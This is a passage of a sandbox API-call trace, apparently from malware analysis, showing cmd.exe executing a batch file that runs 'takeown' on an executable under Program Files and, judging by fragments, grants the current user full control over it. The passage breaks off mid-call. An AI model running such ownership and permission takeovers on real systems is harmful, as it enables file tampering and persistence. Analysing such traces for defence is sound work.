nBufferLength=0x208, lpBuffer=0x5022f8, lpFilePart=0x32e764 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32e764*="Desktop") returned 0x25 [0243.262] SetErrorMode (uMode=0x0) returned 0x1 [0243.263] GetProcessHeap () returned 0x4f0000 [0243.263] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5022f0, Size=0x64) returned 0x5022f0 [0243.263] GetProcessHeap () returned 0x4f0000 [0243.263] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x5022f0) returned 0x64 [0243.263] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0243.263] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0243.263] GetProcessHeap () returned 0x4f0000 [0243.263] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x120) returned 0x5046c0 [0243.263] GetProcessHeap () returned 0x4f0000 [0243.263] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x238) returned 0x5047e8 [0243.263] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.263] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0xffffffff [0243.264] GetLastError () returned 0x2 [0243.264] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0xffffffff [0243.264] GetLastError () returned 0x2 [0243.265] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0x4f1288 [0243.265] FindClose (in: hFindFile=0x4f1288 | out: hFindFile=0x4f1288) returned 1 [0243.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0xffffffff [0243.266] GetLastError () returned 0x2 [0243.266] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x32e4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e4e0) returned 0x4f1288 [0243.266] FindClose (in: hFindFile=0x4f1288 | out: hFindFile=0x4f1288) returned 1 [0243.266] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0243.266] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0243.266] GetConsoleTitleW (in: lpConsoleTitle=0x32e9d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.266] InitializeProcThreadAttributeList (in: lpAttributeList=0x32e860, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32e928 | out: lpAttributeList=0x32e860, lpSize=0x32e928) returned 1 [0243.266] UpdateProcThreadAttribute (in: lpAttributeList=0x32e860, dwFlags=0x0, Attribute=0x60001, lpValue=0x32e920, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32e860, lpPreviousValue=0x0) returned 1 [0243.266] GetStartupInfoW (in: lpStartupInfo=0x32e81c | out: lpStartupInfo=0x32e81c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0243.267] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0243.267] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x32e8bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32e908 | out: lpCommandLine="takeown /F \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"", lpProcessInformation=0x32e908*(hProcess=0x78, hThread=0x74, dwProcessId=0x7d8, dwThreadId=0x620)) returned 1 [0243.285] CloseHandle (hObject=0x74) returned 1 [0243.285] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0243.285] GetProcessHeap () returned 0x4f0000 [0243.285] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae8 | out: hHeap=0x4f0000) returned 1 [0243.285] GetEnvironmentStringsW () returned 0x505f80* [0243.286] GetProcessHeap () returned 0x4f0000 [0243.286] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x506ae8 [0243.286] FreeEnvironmentStringsW (penv=0x505f80) returned 1 [0243.286] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0244.224] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x32e7fc | out: lpExitCode=0x32e7fc*=0x0) returned 1 [0244.224] CloseHandle (hObject=0x78) returned 1 [0244.224] _vsnwprintf (in: _Buffer=0x32e944, _BufferCount=0x13, _Format="%08X", _ArgList=0x32e808 | out: _Buffer="00000000") returned 8 [0244.224] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0244.224] GetProcessHeap () returned 0x4f0000 [0244.224] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae8 | out: hHeap=0x4f0000) returned 1 [0244.224] GetEnvironmentStringsW () returned 0x505f80* [0244.224] GetProcessHeap () returned 0x4f0000 [0244.224] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x506ae8 [0244.224] FreeEnvironmentStringsW (penv=0x505f80) returned 1 [0244.224] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0244.224] GetProcessHeap () returned 0x4f0000 [0244.224] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae8 | out: hHeap=0x4f0000) returned 1 [0244.224] GetEnvironmentStringsW () returned 0x505f80* [0244.224] GetProcessHeap () returned 0x4f0000 [0244.224] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x506ae8 [0244.224] FreeEnvironmentStringsW (penv=0x505f80) returned 1 [0244.224] GetProcessHeap () returned 0x4f0000 [0244.224] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f0ce8 | out: hHeap=0x4f0000) returned 1 [0244.225] DeleteProcThreadAttributeList (in: lpAttributeList=0x32e860 | out: lpAttributeList=0x32e860) [0244.225] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.225] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0244.225] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.225] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0244.225] _get_osfhandle (_FileHandle=0) returned 0x3 [0244.225] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0244.226] SetConsoleInputExeNameW () returned 0x1 [0244.226] GetConsoleOutputCP () returned 0x1b5 [0244.226] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0244.226] SetThreadUILanguage (LangId=0x0) returned 0x409 [0244.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x32f07c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0244.227] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0244.227] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.227] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0244.227] GetProcessHeap () returned 0x4f0000 [0244.227] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504918 | out: hHeap=0x4f0000) returned 1 [0244.227] GetProcessHeap () returned 0x4f0000 [0244.227] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5047e8 | out: hHeap=0x4f0000) returned 1 [0244.227] GetProcessHeap () returned 0x4f0000 [0244.227] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5046c0 | out: hHeap=0x4f0000) returned 1 [0244.227] GetProcessHeap () returned 0x4f0000 [0244.227] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5022f0 | out: hHeap=0x4f0000) returned 1 [0244.227] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x512c10 | out: hHeap=0x4f0000) returned 1 [0244.228] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5044a8 | out: hHeap=0x4f0000) returned 1 [0244.228] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504428 | out: hHeap=0x4f0000) returned 1 [0244.228] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5042f8 | out: hHeap=0x4f0000) returned 1 [0244.228] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5041d0 | out: hHeap=0x4f0000) returned 1 [0244.228] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504160 | out: hHeap=0x4f0000) returned 1 [0244.228] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f1218 | out: hHeap=0x4f0000) returned 1 [0244.228] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505760 | out: hHeap=0x4f0000) returned 1 [0244.228] GetProcessHeap () returned 0x4f0000 [0244.228] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f11b8 | out: hHeap=0x4f0000) returned 1 [0244.229] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.229] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0244.229] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x32f060, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x32f060*=0xb3, lpOverlapped=0x0) returned 1 [0244.229] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0244.229] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0244.230] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.230] GetFileType (hFile=0x78) returned 0x1 [0244.230] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.230] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0244.230] GetProcessHeap () returned 0x4f0000 [0244.230] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x514af8 [0244.230] GetProcessHeap () returned 0x4f0000 [0244.230] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x5c) returned 0x4f11b8 [0244.230] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\accupos.exe", nBufferLength=0x208, lpBuffer=0x32e7f0, lpFilePart=0x32e7e8 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpFilePart=0x32e7e8*="accupos.exe") returned 0x28 [0244.230] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)", lpFindFileData=0x32e504 | out: lpFindFileData=0x32e504*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x34376de0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x34376de0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0x4f1220 [0244.231] FindClose (in: hFindFile=0x4f1220 | out: hFindFile=0x4f1220) returned 1 [0244.231] _wcsnicmp (_String1="PROGRA~2", _String2="Program Files (x86)", _MaxCount=0x13) returned 17 [0244.231] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe", lpFindFileData=0x32e504 | out: lpFindFileData=0x32e504*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe1ab6be0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1ab6be0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 0x4f1220 [0244.231] FindClose (in: hFindFile=0x4f1220 | out: hFindFile=0x4f1220) returned 1 [0244.231] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpFindFileData=0x32e504 | out: lpFindFileData=0x32e504*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79dc8ba0, ftCreationTime.dwHighDateTime=0x1d5c48c, ftLastAccessTime.dwLowDateTime=0xbbb3e4e0, ftLastAccessTime.dwHighDateTime=0x1d5639a, ftLastWriteTime.dwLowDateTime=0xbbb3e4e0, ftLastWriteTime.dwHighDateTime=0x1d5639a, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accupos.exe", cAlternateFileName="")) returned 0x4f1220 [0244.231] FindClose (in: hFindFile=0x4f1220 | out: hFindFile=0x4f1220) returned 1 [0244.231] GetProcessHeap () returned 0x4f0000 [0244.231] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x20) returned 0x505838 [0244.231] GetProcessHeap () returned 0x4f0000 [0244.231] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x514af8 | out: hHeap=0x4f0000) returned 1 [0244.232] GetProcessHeap () returned 0x4f0000 [0244.232] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2c) returned 0x4f1280 [0244.234] _tell (_FileHandle=3) returned 63 [0244.234] _close (_FileHandle=3) returned 0 [0244.234] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32ee34 | out: _Buffer="\r\n") returned 2 [0244.234] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.234] GetFileType (hFile=0x7) returned 0x2 [0244.234] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.234] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf4 | out: lpMode=0x32edf4) returned 1 [0244.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.235] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32ee20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ee20*=0x2) returned 1 [0244.495] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0244.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0244.495] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x32ee30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0244.495] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x32ee30 | out: _Buffer=">") returned 1 [0244.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.495] GetFileType (hFile=0x7) returned 0x2 [0244.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.496] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf8 | out: lpMode=0x32edf8) returned 1 [0244.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.496] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x32ee24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x32ee24*=0x26) returned 1 [0244.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.497] GetFileType (hFile=0x7) returned 0x2 [0244.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f07c | out: lpMode=0x32f07c) returned 1 [0244.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.497] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4f0cf0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x32f0a8, lpReserved=0x0 | out: lpBuffer=0x4f0cf0*, lpNumberOfCharsWritten=0x32f0a8*=0x3) returned 1 [0244.498] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x32f0b4 | out: _Buffer=" FN=\"accupos.exe\" ") returned 18 [0244.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.498] GetFileType (hFile=0x7) returned 0x2 [0244.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.498] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0244.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.499] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x12, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x12) returned 1 [0244.499] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32f0d4 | out: _Buffer="\r\n") returned 2 [0244.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.499] GetFileType (hFile=0x7) returned 0x2 [0244.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.500] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f094 | out: lpMode=0x32f094) returned 1 [0244.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.500] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f0c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0c0*=0x2) returned 1 [0244.502] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0244.502] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0244.502] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0244.502] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0244.502] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0244.502] _wcsicmp (_String1="set", _String2="CD") returned 16 [0244.502] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0244.502] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0244.502] _wcsicmp (_String1="set", _String2="REN") returned 1 [0244.502] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0244.503] _wcsicmp (_String1="set", _String2="SET") returned 0 [0244.503] GetConsoleTitleW (in: lpConsoleTitle=0x32ec44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0244.504] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0244.504] SetEnvironmentVariableW (lpName="FN", lpValue="\"accupos.exe\"") returned 1 [0244.504] GetProcessHeap () returned 0x4f0000 [0244.504] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae8 | out: hHeap=0x4f0000) returned 1 [0244.504] GetEnvironmentStringsW () returned 0x504bf8* [0244.504] GetProcessHeap () returned 0x4f0000 [0244.504] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb7e) returned 0x505f80 [0244.504] FreeEnvironmentStringsW (penv=0x504bf8) returned 1 [0244.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.504] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0244.505] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.505] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0244.505] _get_osfhandle (_FileHandle=0) returned 0x3 [0244.505] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0244.506] SetConsoleInputExeNameW () returned 0x1 [0244.506] GetConsoleOutputCP () returned 0x1b5 [0244.506] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0244.506] SetThreadUILanguage (LangId=0x0) returned 0x409 [0244.506] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x32f07c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0244.508] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0244.508] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.508] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0244.508] GetProcessHeap () returned 0x4f0000 [0244.508] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504198 | out: hHeap=0x4f0000) returned 1 [0244.508] GetProcessHeap () returned 0x4f0000 [0244.508] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504160 | out: hHeap=0x4f0000) returned 1 [0244.508] GetProcessHeap () returned 0x4f0000 [0244.508] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f1280 | out: hHeap=0x4f0000) returned 1 [0244.508] GetProcessHeap () returned 0x4f0000 [0244.508] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f0ce8 | out: hHeap=0x4f0000) returned 1 [0244.508] GetProcessHeap () returned 0x4f0000 [0244.508] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f1220 | out: hHeap=0x4f0000) returned 1 [0244.508] GetProcessHeap () returned 0x4f0000 [0244.508] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505838 | out: hHeap=0x4f0000) returned 1 [0244.508] GetProcessHeap () returned 0x4f0000 [0244.508] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f11b8 | out: hHeap=0x4f0000) returned 1 [0244.509] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.509] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0244.509] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x32f060, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x32f060*=0xa3, lpOverlapped=0x0) returned 1 [0244.509] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0244.509] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0244.509] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.509] GetFileType (hFile=0x78) returned 0x1 [0244.510] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.510] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0244.510] GetProcessHeap () returned 0x4f0000 [0244.510] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x514af8 [0244.510] GetProcessHeap () returned 0x4f0000 [0244.510] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x70) returned 0x4f11b8 [0244.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x32e7f0, lpFilePart=0x32e7e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x32e7e8*="Ch81ANBE.bat") returned 0x32 [0244.510] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32e504 | out: lpFindFileData=0x32e504*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4f1230 [0244.511] FindClose (in: hFindFile=0x4f1230 | out: hFindFile=0x4f1230) returned 1 [0244.511] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32e504 | out: lpFindFileData=0x32e504*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4f1230 [0244.511] FindClose (in: hFindFile=0x4f1230 | out: hFindFile=0x4f1230) returned 1 [0244.511] _wcsnicmp 